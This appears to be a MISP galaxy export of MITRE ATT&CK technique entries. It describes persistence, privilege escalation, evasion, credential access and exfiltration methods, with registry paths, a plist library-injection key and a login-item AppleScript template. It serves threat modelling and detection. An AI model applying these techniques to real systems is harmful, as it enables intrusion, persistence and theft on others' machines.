Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. (Citation: Elastic Process Injection July 2017)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.

The tag is: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009"

Table 3793. Table References
Links
https://attack.mitre.org/techniques/T1546/009
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://technet.microsoft.com/en-us/sysinternals/bb963902
https://forum.sysinternals.com/appcertdlls_topic12546.html

Resource Forking - T1564.009

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)

Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Resource Forking - T1564.009"

Table 3794. Table References
Links
https://attack.mitre.org/techniques/T1564/009
http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553
https://flylib.com/books/en/4.395.1.192/1/
https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/
https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/
https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html

LSASS Driver - T1547.008

Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)

Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.

The tag is: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008"

Table 3795. Table References
Links
https://attack.mitre.org/techniques/T1547/008
https://technet.microsoft.com/library/cc961760.aspx
https://technet.microsoft.com/library/dn408187.aspx
https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx
https://technet.microsoft.com/en-us/sysinternals/bb963902

Shortcut Modification - T1547.009

Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.

Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.

The tag is: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009"

Table 3796. Table References
Links
https://attack.mitre.org/techniques/T1547/009
https://capec.mitre.org/data/definitions/132.html
https://www.youtube.com/watch?v=nJ0UsyiUEqQ

Digital Certificates - T1588.004

Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.

Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.

Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let’s Encrypt FAQ)

After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.

The tag is: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1588.004"

Table 3797. Table References
Links
https://attack.mitre.org/techniques/T1588/004
https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
https://letsencrypt.org/docs/faq/
https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
https://www.recordedfuture.com/cobalt-strike-servers/

Password Managers - T1555.005

Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)

Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610) Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005"

Table 3798. Table References
Links
https://attack.mitre.org/techniques/T1555/005
https://www.ise.io/casestudies/password-manager-hacking/
https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf
https://github.com/GhostPack/KeeThief
https://nvd.nist.gov/vuln/detail/CVE-2019-3610
https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware

Scan Databases - T1596.005

Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)

Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: misp-galaxy:mitre-attack-pattern="Scan Databases - T1596.005"

Table 3799. Table References
Links
https://attack.mitre.org/techniques/T1596/005
https://shodan.io

Application Shimming - T1546.011

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)

Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

<code>%WINDIR%\AppPatch\sysmain.sdb</code> and
<code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>

Custom databases are stored in:

<code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code> and
<code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>

Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.

The tag is: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011"

Table 3800. Table References
Links
https://attack.mitre.org/techniques/T1546/011
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf
https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf

Plist Modification - T1547.011

Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, <code>Info.plist</code>, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple’s Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description)

Adversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the <code>DYLD_INSERT_LIBRARIES</code> key combined with a path to a malicious dylib under the <code>EnvironmentVariables</code> key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the <code>LSEnvironment</code> key in the application’s <code>Info.plist</code> file.(Citation: wardle artofmalware volume1)

The tag is: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011"

Table 3801. Table References
Links
https://attack.mitre.org/techniques/T1547/011
https://fileinfo.com/extension/plist
https://taomm.org/vol1/pdfs.html

Print Processors - T1547.012

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot.

Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the <code>AddPrintProcessor</code> API call with an account that has <code>SeLoadDriverPrivilege</code> enabled. Alternatively, a print processor can be registered to the print spooler service by adding the <code>HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver</code> Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the <code>GetPrintProcessorDirectory</code> API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Print Processors - T1547.012"

Table 3802. Table References
Links
https://attack.mitre.org/techniques/T1547/012
https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor
https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/

PowerShell Profile - T1546.013

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.

[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the <code>-NoProfile</code> flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)

An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)

The tag is: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013"

Table 3803. Table References
Links
https://attack.mitre.org/techniques/T1546/013
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6
https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html
http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf

Active Setup - T1547.014

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account’s associated permissions level.

Adversaries may abuse Active Setup by creating a key under <code> HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\</code> and setting a malicious value for <code>StubPath</code>. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)

Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.

The tag is: misp-galaxy:mitre-attack-pattern="Active Setup - T1547.014"

Table 3804. Table References
Links
https://attack.mitre.org/techniques/T1547/014
https://helgeklein.com/blog/2010/04/active-setup-explained/
https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf
https://citizenlab.ca/2015/12/packrat-report/
https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html
https://securelist.com/whos-really-spreading-through-the-bright-star/68978/
https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/
https://technet.microsoft.com/en-us/sysinternals/bb963902

Login Items - T1547.015

Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.

Login items installed using the Service Management Framework leverage <code>launchd</code>, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.

Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as <code>tell application “System Events” to make login item at end with properties /path/to/executable</code>.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in <code>~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm</code>.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Login Items - T1547.015"

Table 3805. Table References
Links
https://attack.mitre.org/techniques/T1547/015
https://support.apple.com/guide/mac-help/open-items-automatically-when-you-log-in-mh15189/mac
https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html
https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/
https://developer.apple.com/documentation/coreservices/launch_services
https://eclecticlight.co/2018/05/22/running-at-startup-when-to-use-a-login-item-or-a-launchagent-launchdaemon/
https://developer.apple.com/library/archive/samplecode/LoginItemsAE/Introduction/Intro.html#//apple_ref/doc/uid/DTS10003788
https://eclecticlight.co/2021/09/16/how-to-run-an-app-or-tool-at-startup/
http://www.hexed.in/2019/07/osxdok-analysis.html
https://gist.github.com/kaloprominat/6111584
https://objective-see.com/blog/blog_0x25.html
https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/
https://objective-see.com/blog/blog_0x44.html
https://objective-see.com/blog/blog_0x31.html
https://www.sentinelone.com/blog/how-malware-persists-on-macos/
https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1

Identify groups/roles - T1270

Personnel internally to a company may belong to a group or maintain a role with electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is a system administrator. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Identify groups/roles - T1270"

Table 3806. Table References
Links
https://attack.mitre.org/techniques/T1270

Proxy/protocol relays - T1304

Proxies act as an intermediary for clients seeking resources from other systems. Using a proxy may make it more difficult to track back the origin of a network communication. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Proxy/protocol relays - T1304"

Table 3807. Table References
Links
https://attack.mitre.org/techniques/T1304

Scheduled Task/Job - T1053

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

The tag is: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053"

Table 3808. Table References
Links
https://attack.mitre.org/techniques/T1053
https://capec.mitre.org/data/definitions/557.html
https://technet.microsoft.com/en-us/library/cc785125.aspx

Scheduled Task/Job - T1603

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.

On Android, the WorkManager API allows asynchronous tasks to be scheduled with the system. WorkManager was introduced to unify task scheduling on Android, using JobScheduler, GcmNetworkManager, and AlarmManager internally. WorkManager offers a lot of flexibility for scheduling, including periodically, one time, or constraint-based (e.g. only when the device is charging).(Citation: Android WorkManager)

On iOS, the NSBackgroundActivityScheduler API allows asynchronous tasks to be scheduled with the system. The tasks can be scheduled to be repeating or non-repeating, however, the system chooses when the tasks will be executed. The app can choose the interval for repeating tasks, or the delay between scheduling and execution for one-time tasks.(Citation: Apple NSBackgroundActivityScheduler)

The tag is: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1603"

Table 3809. Table References
Links
https://attack.mitre.org/techniques/T1603
https://developer.android.com/topic/libraries/architecture/workmanager
https://developer.apple.com/documentation/foundation/nsbackgroundactivityscheduler

Develop KITs/KIQs - T1227

Leadership derives Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from the areas of most interest to them. KITs are an expression of management’s intelligence needs with respect to early warning, strategic and operational decisions, knowing the competition, and understanding the competitive situation. KIQs are the critical questions aligned by KIT which provide the basis for collection plans, create a context for analytic work, and/or identify necessary external operations. (Citation: Herring1999)

The tag is: misp-galaxy:mitre-attack-pattern="Develop KITs/KIQs - T1227"

Table 3810. Table References
Links
https://attack.mitre.org/techniques/T1227

System Shutdown/Reboot - T1529

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.

Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)

The tag is: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529"

Table 3811. Table References
Links
https://attack.mitre.org/techniques/T1529
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown
https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

Virtualization/Sandbox Evasion - T1497

Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)

Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497"

Table 3812. Table References
Links
https://attack.mitre.org/techniques/T1497
https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/

Data Obfuscation - T1001

Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.

The tag is: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001"

Table 3813. Table References
Links
https://attack.mitre.org/techniques/T1001
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Web Shell - T1100

A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)

Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary’s primary access methods are detected and removed.

The tag is: misp-galaxy:mitre-attack-pattern="Web Shell - T1100"

View relationships graph

Web Shell - T1100 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 3814. Table References
Links
https://attack.mitre.org/techniques/T1100
https://capec.mitre.org/data/definitions/650.html
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
https://www.us-cert.gov/ncas/alerts/TA15-314A

Automated Exfiltration - T1020

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

The tag is: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020"

Table 3815. Table References
Links
https://attack.mitre.org/techniques/T1020

Hardware Additions - T1200

Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.

The tag is: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200"

Table 3816. Table References
Links
https://attack.mitre.org/techniques/T1200
https://capec.mitre.org/data/definitions/440.html
https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html
https://www.youtube.com/watch?v=lDvf4ScWbcQ
https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained
https://www.youtube.com/watch?v=fXthwl6ShOg
https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/

Data Compressed - T1002

An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.

The tag is: misp-galaxy:mitre-attack-pattern="Data Compressed - T1002"

View relationships graph

Data Compressed - T1002 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

Table 3817. Table References
Links
https://attack.mitre.org/techniques/T1002
https://en.wikipedia.org/wiki/List_of_file_signatures

Network Sniffing - T1040

Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.

The tag is: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040"

Table 3818. Table References
Links
https://attack.mitre.org/techniques/T1040
https://capec.mitre.org/data/definitions/158.html

New Service - T1050

When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service’s configuration information, including the file path to the service’s executable, is stored in the Windows Registry.

Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).

The tag is: misp-galaxy:mitre-attack-pattern="New Service - T1050"

View relationships graph

New Service - T1050 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 3819. Table References
Links
https://attack.mitre.org/techniques/T1050
https://capec.mitre.org/data/definitions/550.html
https://technet.microsoft.com/en-us/library/cc772408.aspx
https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697
https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection
https://technet.microsoft.com/en-us/sysinternals/bb963902

Weaken Encryption - T1600

Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)

Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.

Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="Weaken Encryption - T1600"

Table 3820. Table References
Links
https://attack.mitre.org/techniques/T1600
https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
